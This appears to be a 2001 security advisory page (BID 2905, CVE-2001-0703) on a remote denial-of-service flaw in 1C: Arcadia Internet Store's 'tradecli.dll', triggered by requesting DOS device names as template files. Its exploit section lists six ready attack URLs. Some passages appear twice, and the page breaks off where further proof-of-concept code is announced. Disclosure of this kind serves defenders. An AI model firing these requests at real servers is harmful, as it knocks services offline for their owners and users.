1C: Arcadia Internet Store Denial of Service Vulnerability
BID:2905
Info
1C: Arcadia Internet Store Denial of Service Vulnerability
| Bugtraq ID: | 2905 |
| Class: | Access Validation Error |
| CVE: |
CVE-2001-0703 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 21 2001 12:00AM |
| Updated: | Jul 11 2009 06:56AM |
| Credit: | This vulnerability was submitted to BugTraq on June 21st, 2001 by ViperSV <[email protected]> of NERF Security gr0up. |
| Vulnerable: |
Arcadia 1C: Arcadia Internet Store 1.0 |
| Not Vulnerable: | |
Discussion
1C: Arcadia Internet Store Denial of Service Vulnerability
1C: Arcadia Internet Store is a online shopping utility for Microsoft Windows NT/2000 that is fully integratable with 1C: Enterprise, another popular Russian web-commerce utility.
One of the components of this package, 'tradecli.dll', allows users to specify a template file, the contents of which will be output.
Remote attackers can request dos devices, such as 'con', 'com1', 'com2', etc. When 'tradecli.dll' attempts to open these files a denial of service may occur.
1C: Arcadia Internet Store is a online shopping utility for Microsoft Windows NT/2000 that is fully integratable with 1C: Enterprise, another popular Russian web-commerce utility.
One of the components of this package, 'tradecli.dll', allows users to specify a template file, the contents of which will be output.
Remote attackers can request dos devices, such as 'con', 'com1', 'com2', etc. When 'tradecli.dll' attempts to open these files a denial of service may occur.
Exploit / POC
1C: Arcadia Internet Store Denial of Service Vulnerability
This example was provided by NERF Security gr0up:
Exploit:
http://host/scripts/tradecli.dll?template=com1
http://host/scripts/tradecli.dll?template=com2
http://host/scripts/tradecli.dll?template=com3
http://host/scripts/tradecli.dll?template=con
http://host/scripts/tradecli.dll?template=prn
http://host/scripts/tradecli.dll?template=aux
In addition, Linux Sex <[email protected]> submitted proof-of-concept exploit code:
This example was provided by NERF Security gr0up:
Exploit:
http://host/scripts/tradecli.dll?template=com1
http://host/scripts/tradecli.dll?template=com2
http://host/scripts/tradecli.dll?template=com3
http://host/scripts/tradecli.dll?template=con
http://host/scripts/tradecli.dll?template=prn
http://host/scripts/tradecli.dll?template=aux
In addition, Linux Sex <[email protected]> submitted proof-of-concept exploit code: